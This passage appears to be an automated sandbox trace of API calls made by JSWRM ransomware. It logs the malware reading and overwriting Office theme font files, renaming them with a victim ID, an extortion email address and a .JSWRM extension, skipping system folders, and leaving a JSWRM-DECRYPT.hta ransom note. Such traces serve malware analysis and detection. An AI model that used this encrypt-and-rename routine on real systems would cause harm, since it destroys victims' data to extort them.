[0101.157] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xea0, lpOverlapped=0x0) returned 1 [0101.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.159] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xea0, lpOverlapped=0x0) returned 1 [0101.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.159] CloseHandle (hObject=0x314) returned 1 [0101.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0101.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0101.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0101.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0101.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.159] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Gill Sans MT.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\gill sans mt.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Gill Sans MT.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\gill sans mt.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0101.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0101.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0101.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0101.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.160] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32d6fe35, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x32d6fe35, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x32d6fe35, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0101.160] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0101.160] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0101.160] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0101.160] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0101.160] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0101.160] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0101.160] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0101.161] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0101.161] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0101.161] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0101.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0101.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0101.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0101.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0101.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0101.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0101.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.161] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11541b08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe35, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Office 2007 - 2010.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2=".") returned 1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="..") returned 1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="...") returned 1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="windows") returned -1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="recovery") returned -1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="perflogs") returned -1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="documents and settings") returned 1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="system volume information") returned -1 [0101.161] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="msocache") returned 1 [0101.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0101.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office 2007 - 2010.xml", lpUsedDefaultChar=0x0) returned 22 [0101.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office 2007 - 2010.xml", lpUsedDefaultChar=0x0) returned 22 [0101.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0101.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0101.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Office 2007 - 2010.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\office 2007 - 2010.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.163] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3637) returned 1 [0101.163] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe30) returned 0x206858 [0101.163] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xe30, lpOverlapped=0x0) returned 1 [0101.165] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.165] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xe30, lpOverlapped=0x0) returned 1 [0101.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.165] CloseHandle (hObject=0x314) returned 1 [0101.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0101.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0101.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0101.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0101.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0101.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.165] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Office 2007 - 2010.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\office 2007 - 2010.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Office 2007 - 2010.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\office 2007 - 2010.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0101.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0101.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0101.184] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde1, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Times New Roman-Arial.xml", cAlternateFileName="TIMESN~1.XML")) returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2=".") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="..") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="...") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="windows") returned -1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="recovery") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="perflogs") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="documents and settings") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="system volume information") returned 1 [0101.184] lstrcmpiW (lpString1="Times New Roman-Arial.xml", lpString2="msocache") returned 1 [0101.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Times New Roman-Arial.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0101.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Times New Roman-Arial.xml", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Times New Roman-Arial.xml", lpUsedDefaultChar=0x0) returned 25 [0101.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Times New Roman-Arial.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0101.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Times New Roman-Arial.xml", cchWideChar=25, lpMultiByteStr=0x2413a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Times New Roman-Arial.xml", lpUsedDefaultChar=0x0) returned 25 [0101.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0101.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0101.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Times New Roman-Arial.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\times new roman-arial.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.185] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3553) returned 1 [0101.186] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xde0) returned 0x206858 [0101.186] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xde0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xde0, lpOverlapped=0x0) returned 1 [0101.188] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.188] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xde0, lpOverlapped=0x0) returned 1 [0101.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.188] CloseHandle (hObject=0x314) returned 1 [0101.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0101.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Times New Roman-Arial.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\times new roman-arial.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Times New Roman-Arial.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\times new roman-arial.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0101.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0101.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0101.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0101.189] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdd7, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="TrebuchetMs.xml", cAlternateFileName="TREBUC~1.XML")) returned 1 [0101.189] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2=".") returned 1 [0101.189] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="..") returned 1 [0101.189] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="...") returned 1 [0101.189] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="windows") returned -1 [0101.189] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="recovery") returned 1 [0101.189] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="perflogs") returned 1 [0101.190] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="documents and settings") returned 1 [0101.190] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.190] lstrcmpiW (lpString1="TrebuchetMs.xml", lpString2="system volume information") returned 1 [0101.190] lstrcmpiW 